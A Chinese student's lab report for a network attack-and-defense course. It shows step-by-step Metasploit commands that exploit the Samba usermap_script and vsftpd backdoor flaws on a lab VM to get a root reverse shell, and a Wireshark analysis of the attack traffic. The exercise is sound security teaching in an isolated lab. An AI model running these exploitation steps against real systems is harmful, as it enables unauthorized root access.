20251913 2025-2026-2 《网络攻防实践》 第7次作业

1.实践内容

使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

  • 启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

  • 使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

  • 选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

  • 设置渗透攻击参数(RHOST,LHOST,TARGET等);

  • 执行渗透攻击;

  • 查看是否正确得到远程Shell,并查看获得的权限。

实践作业:攻防对抗实践

攻击方

使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方

使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

本次实验用到的靶机和虚拟机IP地址如下表所示

虚拟机 地址
KALI(攻击机) 192.168.200.4
Metasploit_Ubuntu(靶机) 192.168.200.7

1、通过命令msfconsole启动Metasploit软件
image
2、通过下面的命令来查找Linux靶机上Samba服务的usermap_script漏洞,使用它并查看与该渗透攻击模块相兼容的攻击载荷。

search usermap_script
use 0
show payloads

image

3.可以看到本次实践已经给出要使用的攻击模块为samba服务,因此输入search samba
image
4、通过命令set payload cmd/unix/reverse_netcat来选择攻击载荷
image

5、通过命令set rhost 192.168.200.7set lhost 192.168.200.4来设置渗透攻击参数,通过命令show options可以查看是否设置成功。这里的记录显示已经设置成功
image

6、通过命令exploit进行攻击
image
7、输入shell加回车后进入命令行,再通过命令ifconfig来查看是否正确得到远程Shell。此时可以看到攻击机已经远程连接到靶机,显示的是靶机的ip地址
image
8、通过命令whoami来查看获得的权限,显示已经取得root权限
image

2.2 攻防对抗实践

攻击方:使用Metasploit,选择靶机中的vsftpd后门漏洞进行渗透攻击
重新打开一个终端通过命令msfconsole启动Metasploit软件
1、通过命令nmap -sV来查看存在的漏洞,这里选择vsftpd安全漏洞进行攻击
image
2、通过命令search vsftpd来搜索漏洞
image

3、通过命令use 0来使用vsftpd后门漏洞。通过命令show payloads来显示可用的载荷,查看到只有一个可用载荷
image

4、通过命令set payload cmd/unix/interact来设置这个载荷
image
5、通过命令set rhost 192.168.200.7set lhost 192.168.200.4来设置攻击参数,通过命令show options可以查看是否设置成功
image
6、通过命令exploit启动攻击
image
7、通过shell、回车和ifconfig查看到已经通过漏洞远程连接到靶机
image
8、通过命令whoami来查看获得的权限,显示已经取得root权限
image

防守方:通过 wireshark分析攻击过程

1、防守方通过过滤端口为6200的数据包可以看到攻击者的IP为192.168.200.4,端口46531,目标IP192.168.200.7
image
2、打开一个FTP数据包追踪可以看到该后门漏洞的原理的操作,可以看到攻击者通过输入结尾是:)的用户名,FTP服务器开启一个后门,允许该用户进行任何操作

image
3、追踪TCP数据流可以看到攻击者进行的一系列操作
0dcb524b6ae492a53bda683ece180d1c

3.学习中遇到的问题及解决

  • 问题1:使用命令exploit失败
    image

  • 问题1解决方案:重启msfconsole
    image

  • 问题2:在2.1中的第三步无法使用samba

  • 问题2解决方案:重新安装一个Metasploit_Ubuntu2.0就可以

4.实践总结

本次实验让我切身感受到Metasploit自动化渗透的威力。一方面更清楚攻击者的常见手法,另一方面也提醒自己作为安全防御者,必须通过及时的安全更新、配置规范、网络隔离和流量监测等手段多层面防范。同时,本次实验所有操作均在隔离的虚拟机测试环境中进行,严禁对真实生产环境进行渗透测试。通过此次攻防两端一体化的实践,我对网络攻击的过程、方法和痕迹有了更全面深入的认识。

posted @ 2026-05-07 13:02  山楂糖葫芦  阅读(10)  评论(0)    收藏  举报